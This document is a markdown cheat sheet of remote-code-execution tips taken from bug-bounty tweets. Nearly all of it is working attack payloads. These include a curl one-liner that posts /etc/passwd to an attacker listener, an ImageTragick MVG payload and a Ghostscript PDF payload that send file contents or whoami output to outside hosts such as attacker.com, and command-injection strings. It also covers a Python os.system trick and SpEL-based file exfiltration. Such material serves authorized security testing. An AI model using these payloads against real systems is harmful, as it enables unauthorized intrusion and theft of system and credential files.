# Remote Code Execution (RCE)

* [If server only allows GET and POST method, then try adding “X-HTTP-Method -Override: PUT to achieve RCE via PUT method.](https://twitter.com/rvismit/status/1090125125461200896)
* [Blind RCE - Grabs /etc/passwd and dumps it to your netcat listener via POST `cat /etc/passwd | curl -X POST -d @- http://yourip:yourport/`](https://twitter.com/Random_Robbie/status/992174798699679751)
* [Found an endpoint which is doing something with images? Give this a shot > request=input&\&id , request=input|id , request=inputid or you can even setup a NC & try request=input&\&http://wgetyourserver.com :port & so on. Fuzz Fuzz Fuzz #InfoSecurity #Infosec #BugBounty](https://twitter.com/prateek_0490/status/1050051960932585472)
* [If you ever get the ability to run arbitrary Python code on a server try to get RCE by running: import os;os.system("ls"); Replacing "ls" with any number of shell commands.](https://twitter.com/LooseSecurity/status/1108010869005475845)
* [Recon to RCE: Google "upload" site:”target" -> upload form -> ImageTragick MVG -> RCE PoC: push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1")' pop graphic-context](https://twitter.com/TakSec/status/1136674787072208896)
* [RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64…) ) .putdeviceparams quit #BugBounty](https://twitter.com/huntmost/status/1192670565963911169)
* [#bugbountytip Found an endpoint which is doing something with images? Give this a shot > request=input&\&id , request=input|id , request=input\`id\` or you can even setup a NC & try request=input&\&http://wgetyourserver.com:port & so on. Fuzz Fuzz Fuzz #InfoSecurity #Infosec #BugBounty](https://twitter.com/prateek_0490/status/1050051960932585472)
* [Does the target use AEM? try this path target\[.\]com/etc/groovyconsole.html and use the payload in the pic If you lucky enough you can have nice RCE ;) Good luck :) #bugbounty #bugcrowd #bugbountytips](https://twitter.com/XHackerx007/status/1435139576314671105?s=20)
* [If you can get SpEL injection but can't get RCE, try exfiltrating a file with B64 encoding: T(java.util.Base64).getEncoder().encodeToString(T(http://org.apache.commons.io.FileUtils).readFileToString('/proc/self/cmdline').getBytes())](https://twitter.com/h1pmnh/status/1425831338234589184?s=20)